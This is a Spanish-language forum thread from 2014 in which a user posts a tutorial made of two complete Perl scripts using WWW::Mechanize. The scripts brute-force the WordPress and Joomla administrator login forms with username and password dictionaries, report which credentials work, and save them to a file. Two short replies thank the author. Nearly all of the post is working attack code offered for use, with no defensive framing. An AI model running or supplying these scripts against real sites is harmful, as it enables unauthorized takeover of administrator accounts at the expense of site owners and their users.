elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Los 10 CVE más críticos (peligrosos) de 2020


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Fuerza bruta a login Wordpress y Joomla con Perl Mechanize
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Fuerza bruta a login Wordpress y Joomla con Perl Mechanize  (Leído 4,971 veces)
manudg

Desconectado Desconectado

Mensajes: 10


Ver Perfil WWW
Fuerza bruta a login Wordpress y Joomla con Perl Mechanize
« en: 23 Junio 2014, 23:42 pm »

Pequeño tutorial de como construir scripts con Perl para explotar los formularios de login de Wordpress y Joomla mediante fuerza bruta.

wordpress-login.pl

Código
  1. #!c:/strawberry/perl/bin/perl.exe
  2.  
  3. #Evitar caracteres extraños en la consola de windows
  4. binmode(STDOUT, ":encoding(cp850)");
  5. binmode(STDIN, ":encoding(cp850)");
  6.  
  7. use WWW::Mechanize;
  8. use strict;
  9.  
  10. #parámetros para el script
  11. my $url = $ARGV[0];
  12. my $admin = $ARGV[1];
  13. my $password = $ARGV[2];
  14. my $reporte = $ARGV[3];
  15.  
  16. if (!@ARGV)
  17.    {
  18. print "wordpress-login.pl <url> <admin> <password> opcional<reporte>";
  19. }
  20. else
  21.    {
  22.  my $mechanize = WWW::Mechanize->new();
  23.  #url de destino
  24.  $mechanize->get($url);
  25.  
  26.  #Abrir el diccionario para admin
  27.  open(ADMIN, "<", $admin) || die("Error al abrir el diccionario para admin");
  28.  while(<ADMIN>)
  29.    {
  30. my $adm = $_;
  31. chomp($adm);
  32. #Abrir el diccionario para password
  33. open(PASSWORD, "<", $password) || die("Error al abrir el diccionario para password");
  34. while (<PASSWORD>)
  35.  {
  36.   chomp($_);
  37.   #Enviar el formulario
  38.   $mechanize->submit_form
  39.                  (
  40.     form_id => "loginform",
  41. fields => {log => $adm, pwd => $_}
  42.   );
  43. print "$adm:$_\n";
  44. my $content = $mechanize->content;
  45. #comprobar el contenido
  46. if ($content =~ /Bienvenido/ || $content =~ /Welcome/)
  47.  {
  48.  print "\n\n¡¡¡¡DATOS DE ACCESO!!!! $adm:$_\n\n";
  49.   if ($reporte)
  50.     {
  51.   open(REPORTE, ">", $reporte);
  52.   print REPORTE "¡¡¡¡DATOS DE ACCESO!!!! $adm:$_";
  53.   close(REPORTE);
  54.   print "####Datos guardados en $reporte####\n";
  55. }
  56.   exit;
  57.  }
  58.  }
  59.  close(PASSWORD);
  60. }
  61. close(ADMIN);
  62. }
  63.  



joomla-login.pl

Código
  1. #!c:/strawberry/perl/bin/perl.exe
  2.  
  3. #Evitar caracteres extraños en la consola de windows
  4. binmode(STDOUT, ":encoding(cp850)");
  5. binmode(STDIN, ":encoding(cp850)");
  6.  
  7. use WWW::Mechanize;
  8. use strict;
  9.  
  10. #parámetros para el script
  11. my $url = $ARGV[0];
  12. my $admin = $ARGV[1];
  13. my $password = $ARGV[2];
  14. my $reporte = $ARGV[3];
  15.  
  16. if (!@ARGV)
  17.    {
  18. print "joomla-login.pl <url> <admin> <password> opcional<reporte>";
  19. }
  20. else
  21.    {
  22.  my $mechanize = WWW::Mechanize->new();
  23.  #url de destino
  24.  $mechanize->get($url);
  25.  
  26.  #Abrir el diccionario para admin
  27.  open(ADMIN, "<", $admin) || die("Error al abrir el diccionario para admin");
  28.  while(<ADMIN>)
  29.    {
  30. my $adm = $_;
  31. chomp($adm);
  32. #Abrir el diccionario para password
  33. open(PASSWORD, "<", $password) || die("Error al abrir el diccionario para password");
  34. while (<PASSWORD>)
  35.  {
  36.   chomp($_);
  37.   #Enviar el formulario
  38.   $mechanize->submit_form
  39.                  (
  40.     form_id => "form-login",
  41. fields => {username => $adm, passwd => $_}
  42.   );
  43. print "$adm:$_\n";
  44. my $content = $mechanize->content;
  45. #comprobar el contenido
  46. if ($content =~ /Panel de Control/ || $content =~ /Control Panel/)
  47.  {
  48.  print "\n\n¡¡¡¡DATOS DE ACCESO!!!! $adm:$_\n\n";
  49.   if ($reporte)
  50.     {
  51.   open(REPORTE, ">", $reporte);
  52.   print REPORTE "¡¡¡¡DATOS DE ACCESO!!!! $adm:$_";
  53.   close(REPORTE);
  54.   print "####Datos guardados en $reporte####\n";
  55. }
  56.   exit;
  57.  }
  58.  }
  59.  close(PASSWORD);
  60. }
  61. close(ADMIN);
  62. }
  63.  




En línea

.:UND3R:.
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.118


Ingeniería inversa / MASM


Ver Perfil WWW
Re: Fuerza bruta a login Wordpress y Joomla con Perl Mechanize
« Respuesta #1 en: 24 Junio 2014, 04:47 am »

Excelentes tutoriales, muchas gracias por compartirlos.
En línea


Solicitudes de crack, keygen, serial solo a través de mensajes privados (PM)
manudg

Desconectado Desconectado

Mensajes: 10


Ver Perfil WWW
Re: Fuerza bruta a login Wordpress y Joomla con Perl Mechanize
« Respuesta #2 en: 25 Junio 2014, 13:06 pm »

No hay de que amigo :UND3R:, un placer compartilo en este gran foro, encuentro muchas cosas interesantes en este sitio, un saludo.  ;D
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Fuerza Bruta En VB
Programación Visual Basic
Cicklow 6 7,898 Último mensaje 24 Agosto 2005, 22:51 pm
por 5v5
Fuerza bruta « 1 2 3 »
Programación Visual Basic
vivachapas 25 13,697 Último mensaje 22 Enero 2008, 03:06 am
por vivachapas
Conseguir login por fuerza bruta con Medusa.
Hacking
CloudswX 4 22,873 Último mensaje 3 Febrero 2014, 17:37 pm
por CloudswX
Joomla y Wordpress juntos pero no revueltos
Desarrollo Web
Makinnon 4 2,548 Último mensaje 5 Marzo 2015, 04:37 am
por Makinnon
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines